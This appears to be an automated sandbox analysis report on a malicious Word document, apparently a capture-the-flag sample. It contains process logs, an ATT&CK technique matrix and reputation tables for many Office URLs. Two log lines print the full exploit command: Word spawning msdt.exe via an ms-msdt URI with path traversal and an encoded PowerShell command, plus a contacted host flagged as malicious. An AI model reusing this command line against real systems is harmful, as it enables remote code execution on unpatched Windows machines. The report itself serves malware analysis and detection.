        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 1187
        Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 1129
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX("powershell -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBIAGUAbABsAG8AIABpAHQAcwAgAG0AZQAhACAATQBhAHkAYgBlACAAeQBvAHUAIABjAG8AdQBsAGQAIABsAG8AbwBrACAAYQB0ACAAbQBkAHMAdAA/ACcAKQA7AA=="))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX("powershell -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AFsAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABdADoAOgBTAGgAbwB3ACgAJwBIAGUAbABsAG8AIABpAHQAcwAgAG0AZQAhACAATQBhAHkAYgBlACAAeQBvAHUAIABjAG8AdQBsAGQAIABsAG8AbwBrACAAYQB0ACAAbQBkAHMAdAA/ACcAKQA7AA=="))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Command and Scripting Interpreter        		1
        DLL Side-Loading        		1
        Process Injection        		11
        Masquerading        		OS Credential Dumping1
        Query Registry        		Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
        Encrypted Channel        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default Accounts23
        Exploitation for Client Execution        		Boot or Logon Initialization Scripts1
        DLL Side-Loading        		1
        Process Injection        		LSASS Memory1
        Application Window Discovery        		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
        Ingress Tool Transfer        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
        Obfuscated Files or Information        		Security Account Manager1
        Remote System Discovery        		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
        Non-Application Layer Protocol        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
        DLL Side-Loading        		NTDS2
        File and Directory Discovery        		Distributed Component Object ModelInput CaptureScheduled Transfer13
        Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets12
        System Information Discovery        		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        No Antivirus matches

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://roaming.edog.0%URL Reputationsafe
        https://cdn.entity.0%URL Reputationsafe
        https://powerlift.acompli.net0%URL Reputationsafe
        https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
        https://cortana.ai0%URL Reputationsafe
        https://api.aadrm.com/0%URL Reputationsafe
        https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
        https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
        https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
        https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
        https://officeci.azurewebsites.net/api/0%URL Reputationsafe
        https://store.office.cn/addinstemplate0%URL Reputationsafe
        https://api.aadrm.com0%URL Reputationsafe
        https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
        https://www.odwebp.svc.ms0%URL Reputationsafe
        https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
        https://dataservice.o365filtering.com/0%URL Reputationsafe
        https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
        https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
        https://ncus.contentsync.0%URL Reputationsafe
        https://apis.live.net/v5.0/0%URL Reputationsafe
        https://wus2.contentsync.0%URL Reputationsafe
        https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
        https://ncus.pagecontentsync.0%URL Reputationsafe
        https://cyberleague.co/th1s.html0%Avira URL Cloudsafe
        https://skyapi.live.net/Activity/0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        cyberleague.co
        		13.250.15.191
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://cyberleague.co/th1s.htmltrue
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://api.diagnosticssdf.office.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
            		high
            https://login.microsoftonline.com/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
              		high
              https://shell.suite.office.com:14434EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                		high
                https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                  		high
                  https://autodiscover-s.outlook.com/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                    		high
                    https://roaming.edog.4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                      		high
                      https://cdn.entity.4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                      • URL Reputation: safe
                      		unknown
                      https://api.addins.omex.office.net/appinfo/query4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                        		high
                        https://clients.config.office.net/user/v1.0/tenantassociationkey4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                          		high
                          https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                            		high
                            https://powerlift.acompli.net4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://rpsticket.partnerservices.getmicrosoftkey.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://lookup.onenote.com/lookup/geolocation/v14EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                              		high
                              https://cortana.ai4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                              • URL Reputation: safe
                              		unknown
                              https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                		high
                                https://cloudfiles.onenote.com/upload.aspx4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                  		high
                                  https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                    		high
                                    https://entitlement.diagnosticssdf.office.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                      		high
                                      https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                        		high
                                        https://api.aadrm.com/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://ofcrecsvcapi-int.azurewebsites.net/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                          		high
                                          https://api.microsoftstream.com/api/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                            		high
                                            https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                              		high
                                              https://cr.office.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                		high
                                                https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                • Avira URL Cloud: safe
                                                		low
                                                https://portal.office.com/account/?ref=ClientMeControl4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                  		high
                                                  https://graph.ppe.windows.net4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                    		high
                                                    https://res.getmicrosoftkey.com/api/redemptionevents4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://powerlift-frontdesk.acompli.net4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://tasks.office.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                      		high
                                                      https://officeci.azurewebsites.net/api/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://sr.outlook.office.net/ws/speech/recognize/assistant/work4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                        		high
                                                        https://store.office.cn/addinstemplate4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://api.aadrm.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://outlook.office.com/autosuggest/api/v1/init?cvid=4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                          		high
                                                          https://globaldisco.crm.dynamics.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                            		high
                                                            https://messaging.engagement.office.com/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                              		high
                                                              https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                		high
                                                                https://dev0-api.acompli.net/autodetect4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://www.odwebp.svc.ms4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://api.diagnosticssdf.office.com/v2/feedback4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                  		high
                                                                  https://api.powerbi.com/v1.0/myorg/groups4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                    		high
                                                                    https://web.microsoftstream.com/video/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                      		high
                                                                      https://api.addins.store.officeppe.com/addinstemplate4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://graph.windows.net4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                        		high
                                                                        https://dataservice.o365filtering.com/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://officesetup.getmicrosoftkey.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://analysis.windows.net/powerbi/api4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                          		high
                                                                          https://prod-global-autodetect.acompli.net/autodetect4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://outlook.office365.com/autodiscover/autodiscover.json4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                            		high
                                                                            https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                              		high
                                                                              https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                		high
                                                                                https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                  		high
                                                                                  https://ncus.contentsync.4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                    		high
                                                                                    https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                      		high
                                                                                      http://weather.service.msn.com/data.aspx4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                        		high
                                                                                        https://apis.live.net/v5.0/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                          		high
                                                                                          https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                            		high
                                                                                            https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                              		high
                                                                                              https://management.azure.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                		high
                                                                                                https://outlook.office365.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                  		high
                                                                                                  https://wus2.contentsync.4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://incidents.diagnostics.office.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                    		high
                                                                                                    https://clients.config.office.net/user/v1.0/ios4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                      		high
                                                                                                      https://insertmedia.bing.office.net/odc/insertmedia4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                        		high
                                                                                                        https://o365auditrealtimeingestion.manage.office.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                          		high
                                                                                                          https://outlook.office365.com/api/v1.0/me/Activities4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                            		high
                                                                                                            https://api.office.net4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                              		high
                                                                                                              https://incidents.diagnosticssdf.office.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                		high
                                                                                                                https://asgsmsproxyapi.azurewebsites.net/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://clients.config.office.net/user/v1.0/android/policies4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                  		high
                                                                                                                  https://entitlement.diagnostics.office.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                    		high
                                                                                                                    https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                      		high
                                                                                                                      https://substrate.office.com/search/api/v2/init4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                        		high
                                                                                                                        https://outlook.office.com/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                          		high
                                                                                                                          https://storage.live.com/clientlogs/uploadlocation4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                            		high
                                                                                                                            https://outlook.office365.com/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                              		high
                                                                                                                              https://webshell.suite.office.com4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                		high
                                                                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://substrate.office.com/search/api/v1/SearchHistory4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://management.azure.com/4EBD4D33-9AC4-4F1A-A2A8-B37B0194FDAD.0.drfalse
                                                                                                                                      		high
